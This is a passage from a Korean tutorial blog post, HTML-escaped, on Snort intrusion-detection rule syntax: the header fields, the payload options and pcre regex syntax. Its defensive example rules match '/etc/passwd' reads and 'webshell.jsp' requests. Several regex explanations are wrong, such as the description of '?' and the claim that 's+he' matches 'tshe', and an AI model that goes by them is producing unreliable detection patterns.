&lt;/div&gt;&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style7&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;width: 10.5647%; text-align: justify;&quot;&gt;&lt;b&gt;action&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 13.1228%; text-align: justify;&quot;&gt;&lt;b&gt;protocol&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 17.3091%; text-align: justify;&quot;&gt;&lt;b&gt;ip address&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 10.3321%; text-align: justify;&quot;&gt;&lt;b&gt;port&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 14.6346%; text-align: justify;&quot;&gt;&lt;b&gt;direction&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 24.1695%; text-align: justify;&quot;&gt;&lt;b&gt;ip address&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 9.86704%; text-align: justify;&quot;&gt;&lt;b&gt;port&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 10.5647%; text-align: justify;&quot;&gt;log&lt;/td&gt;&lt;td style=&quot;width: 13.1228%; text-align: justify;&quot;&gt;TCP&lt;/td&gt;&lt;td style=&quot;width: 17.3091%; text-align: justify;&quot;&gt;$EXTERNAL_NET&lt;/td&gt;&lt;td style=&quot;width: 10.3321%; text-align: justify;&quot;&gt;any&lt;/td&gt;&lt;td style=&quot;width: 14.6346%; text-align: justify;&quot;&gt;&amp;lt;&amp;gt;&lt;/td&gt;&lt;td style=&quot;width: 24.1695%; text-align: justify;&quot;&gt;$HOME_NET&lt;/td&gt;&lt;td style=&quot;width: 9.86704%; text-align: justify;&quot;&gt;80&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #EE2323;&quot;&gt;&lt;b&gt;2. Rule Option(룰&lt;/b&gt; &lt;b&gt;옵션)&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;룰옵션은 General, Payload, Non-payload, post-payload 로 주요 4개로 분류되고 주로 Payload 탐지 룰이 사용&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;- 일반 옵션&lt;/span&gt;&lt;/b&gt;&lt;br&gt;1.&amp;nbsp;msg : alert, log에서 저장될 메시지명 지정&lt;br&gt;2. reference : 공격 참조 정보를 제공&lt;br&gt;3. sid : 스노트 규칙을&amp;nbsp; 유일하게 식별하는 식별자&lt;br&gt;&amp;nbsp; &amp;nbsp;- 100미만은 예약&lt;br&gt;&amp;nbsp; &amp;nbsp;- 100~100만은 스노트 지정 룰&lt;br&gt;&amp;nbsp; &amp;nbsp;- 100만 초과는 사용자 정의 룰&lt;br&gt;4. rev : 스노트 규칙의 버전. 수정 횟수&lt;br&gt;5. classtype : 공격 종류와 규칙을 분류&lt;br&gt;6. priority : 분류(classtype) 옵션에 의해 설정된 규칙 우선순위를 강제로 수정&lt;br&gt;7. metadata : Rule 작성자가 추가정보를 Key-Value 형식으로 포함&lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;- 페이로드&lt;/span&gt;&lt;/b&gt;&lt;br&gt;1. content : 탐지할 패턴(문자열)을 설정하는 옵션. &lt;b&gt;text&lt;/b&gt;이거나 &lt;b&gt;binary 형태(헥사값)&lt;/b&gt; 일수 있음.&lt;br&gt;2. nocase : 패턴 매칭 시 대소문자 구별하지 않고 매칭&lt;br&gt;3. offset : 해당 옵션에서 지정한 바이트만큼 떨어진 위치부터 탐색 시작&lt;br&gt;4. depth : 패킷 데이터에서 찾을 내용의 범위를 지정하는 옵션&lt;br&gt;5. distance : 이전 content 설정값 매칭 탐색할 위치를 지정 (시작점 + 바이트 수 다음부터 해당 문자 검사)&lt;br&gt;6. within : 이전 content 설정값 매칭 후 매칭을 끝낼 상대 위치를 지정 ( 시작점부터 바이트 수 이내 범위에서 해당 문자 검사)&lt;br&gt;7. &lt;b&gt;pcre&lt;/b&gt; : 스노트 규칙에서 사용할 수 있는 perl 호환&amp;nbsp;&lt;b&gt;정규 표현식&lt;/b&gt;. '/'는 시작과 끝에 표기, 16진수 앞에는 \x&lt;br&gt;8. flags : TCP 프로토콜에서 제어플레그를 지정하는 것으로 SYN, FIN, URG, ACK을 지정할 수 있다.&amp;nbsp;&lt;br&gt;&amp;nbsp; - SYN 플래그는 flags:S, SYN, FIN 모두 탐지 : flags:SF&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;div&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;옵션 사용 예&lt;/span&gt;&lt;/b&gt;&lt;/p&gt; 
 &lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style15&quot;&gt; 
  &lt;tbody&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%;&quot;&gt;&amp;nbsp;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: center;&quot;&gt;사용 예&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%; text-align: center;&quot;&gt;설명&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;content&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:!&quot;GET&quot;; content:&quot;/etc/passwd&quot;;&amp;nbsp;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;GET 문자열 제외하고 /etc/passwd 문자열 검색&amp;nbsp;&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;nocase&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;ROOT&quot;; nocase;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;ROOT 문자가 대소문자 상관없이 검색 됨&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;offset&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;hello&quot;; offset:20;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;첫 20바이트 이후부터 문자 hello가 있는지 검색&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot; rowspan=&quot;2&quot;&gt;&lt;b&gt;depth&lt;/b&gt;&lt;br&gt;&lt;b&gt;&lt;br&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;GET&quot;; depth:4;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;처음부터 4바이트까지 GET 문자가 있는지 검색&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;webshell.jsp&quot;; offest:4; depth:20;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;처음 4바이트 이후부터의 20바이트 중에 webshell.jsp 문자열을 포함하는지 검사&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;distance&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;abc&quot;; content:&quot;def&quot;; distance:3;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;abc문자 찾은 이후에 3바이트만큼 뒤에서 def 문자가 있는지 검사&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;within&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;content:&quot;GET&quot;; depth:3; content:&quot;downloads&quot;; distance:10; within:9;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;처음 3바이트까지 GET문자가 있는지 확인하고, 그다음 10바이트만큼 떨어진 지점에서 9바이트 이내에 downloads라는 문자가 있는지 검사&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr&gt; 
    &lt;td style=&quot;width: 13.6821%; text-align: center;&quot;&gt;&lt;b&gt;pcre&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 35.775%; text-align: left;&quot;&gt;pcre:&quot;/(http|ftp) Traffic/&quot;&lt;/td&gt; 
    &lt;td style=&quot;width: 50.5427%;&quot;&gt;http Traffic 또는 ftp Traffic 문자열 검색&lt;/td&gt; 
   &lt;/tr&gt; 
  &lt;/tbody&gt; 
 &lt;/table&gt; 
&lt;/div&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;div&gt;
 &lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;
&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;pcre 사용을 위한 정규식 정리&lt;/b&gt;&lt;/h3&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;pcre 사용 규칙 : pcre :&quot;/정규식/&quot;;&lt;/p&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp; - 참고 : &lt;a href=&quot;http://www.perl.or.kr/perl_iyagi/regexp&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;http://www.perl.or.kr/perl_iyagi/regexp&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;메타문자&lt;/b&gt;&lt;/p&gt;&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style15&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;tbody&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;문자&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 20px; text-align: justify;&quot;&gt;내용&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 20px; text-align: justify;&quot;&gt;예시&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 20px; text-align: justify;&quot;&gt;설명&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;^&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 20px; text-align: justify;&quot;&gt;문자열의 시작&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 20px; text-align: justify;&quot;&gt;^t.e&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 20px; text-align: justify;&quot;&gt;the, tie, toe 가능 settle 불가능&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;$&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 20px; text-align: justify;&quot;&gt;문자열의 끝&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 20px; text-align: justify;&quot;&gt;t.e$&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 20px; text-align: justify;&quot;&gt;toe, necktie 가능&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 40px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;.&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 40px; text-align: justify;&quot;&gt;개행문자를 제외한 임의의 한 글자&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 40px; text-align: justify;&quot;&gt;t.e&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 40px; text-align: justify;&quot;&gt;the, tie,toe, settle 등이 가능&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 16px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 16px; text-align: center;&quot;&gt;&lt;b&gt;?&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 16px; text-align: justify;&quot;&gt;0개 또는 1개 이상 반복되는 것과 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 16px; text-align: justify;&quot;&gt;s?he&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 16px; text-align: justify;&quot;&gt;he 또는 she&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;+&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 17px; text-align: justify;&quot;&gt;1개이상 반복된 것과 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 17px; text-align: justify;&quot;&gt;s+he&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 17px; text-align: justify;&quot;&gt;she, sshe, ssssshe tshe 가능. he, the 불가능&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;*&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 17px; text-align: justify;&quot;&gt;0개 이상 반복되는것과 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 17px; text-align: justify;&quot;&gt;s*he&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 17px; text-align: justify;&quot;&gt;she, he, ssssshe, the tshe 가능&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot; rowspan=&quot;2&quot;&gt;&lt;b&gt;()&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 17px; text-align: justify;&quot; rowspan=&quot;2&quot;&gt;서브 패턴(문자열을 하나로 묶음)&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 17px; text-align: justify;&quot;&gt;(eg|le)gs&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 17px; text-align: justify;&quot;&gt;eggs 또는 legs&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;ba(na)+&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;bana, banana, bananana 등&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 23px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 23px; text-align: center;&quot; rowspan=&quot;3&quot;&gt;&lt;b&gt;[]&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 23px; text-align: justify;&quot; rowspan=&quot;3&quot;&gt;문자열 셋&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 23px; text-align: justify;&quot;&gt;[a-z]&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 23px; text-align: justify;&quot;&gt;소문자&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;[0-9a-zA-Z]&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;모든 문자&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;h[aeo]y&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;hay, hey, hoy&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 40px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;[^]&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 40px; text-align: justify;&quot;&gt;문자열 셋 안의 ^는 제외한다는 의미&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 40px; text-align: justify;&quot;&gt;h[^aeo]y&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 40px; text-align: justify;&quot;&gt;hay, hey, hoy를 제외&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot; rowspan=&quot;4&quot;&gt;&lt;b&gt;{}&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 17px; text-align: justify;&quot;&gt;a{m} : 정확하게 m번 반복되는 것과 매칭&lt;br&gt;&lt;br&gt;&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 17px; text-align: justify;&quot;&gt;&lt;br&gt;ba(na){2}&lt;br&gt;&lt;br&gt;&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 17px; text-align: justify;&quot;&gt;banana&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 29.0698%; text-align: justify;&quot;&gt;a{m,} :&amp;nbsp;최소 m개 반복되는 것과 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;ba(na){1, 2}&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;bana, banana&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 29.0698%; text-align: justify;&quot; rowspan=&quot;2&quot;&gt;a{m,n} :&amp;nbsp;최소 m개~n개까지 반복되는 것과 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;ba(na){2, 5}&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;banana, bananana,&amp;nbsp;banananana,&amp;nbsp;banananana&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style=&quot;width: 13.1395%; text-align: justify;&quot;&gt;o{2, 4}p&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; text-align: justify;&quot;&gt;oop, ooop, oooop&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 10.3488%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;\&lt;/b&gt;&lt;/td&gt;&lt;td style=&quot;width: 29.0698%; height: 20px; text-align: justify;&quot;&gt;특수 문자 앞에 둠&lt;/td&gt;&lt;td style=&quot;width: 13.1395%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;width: 47.4419%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;옵션&lt;/b&gt;&lt;/p&gt;&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style15&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;tbody&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;옵션&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;내용&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;예시&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;i&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;대소문자 구별하지 않음&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/where/i&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;s&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;줄이 넘어가도 문자열을 한줄로 인식&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/where/s&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;x&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;패턴에 존재하는 모든 공백 무시&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/where/x&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;M&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;&amp;nbsp;HTTP 메소드 패턴 일치&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/get/Mi&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;U&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;정규화된 URL 디코딩 문자열 패턴 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/cisco/Ui&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;H&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;정규화된 HTTP요청 메시지 Header 내용 패턴 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/get/Hi&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;P&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;HTTP 요청 메시지 Body 내용 패턴 매칭&amp;nbsp;&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/select/Pi&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;S&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;HTTP 응답 코드 패턴 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/200/S&quot;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 10.6977%; height: 17px; text-align: center;&quot;&gt;Y&lt;/td&gt;&lt;td style=&quot;width: 29.3023%; height: 17px; text-align: justify;&quot;&gt;HTTP 응답 상태 메시지 패턴 매칭&lt;/td&gt;&lt;td style=&quot;width: 13.0233%; height: 17px; text-align: justify;&quot;&gt;pcre:&quot;/OK/Y&quot;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;이스케이프 문자&lt;/b&gt;&lt;/p&gt;&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style15&quot; data-ke-align=&quot;alignLeft&quot;&gt;&lt;tbody&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;기호&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;설명&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 17px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 17px; text-align: justify;&quot;&gt;\\&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 17px; text-align: justify;&quot;&gt;\&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 17px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\d&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;모든 숫자&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\D&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;숫자가 아닌 문자&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;[^0-9]&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\s&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;공백&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\t, \n, \r, \f, \v&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\S&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;공백이 아닌 문자&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\w&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;_를 포함한 숫자 또는 문자&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;[A-Za-z0-9_]&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\W&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;숫자 또는 문자가 아닌 것&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\b&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;단어와 공백 사이를 찾음&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: 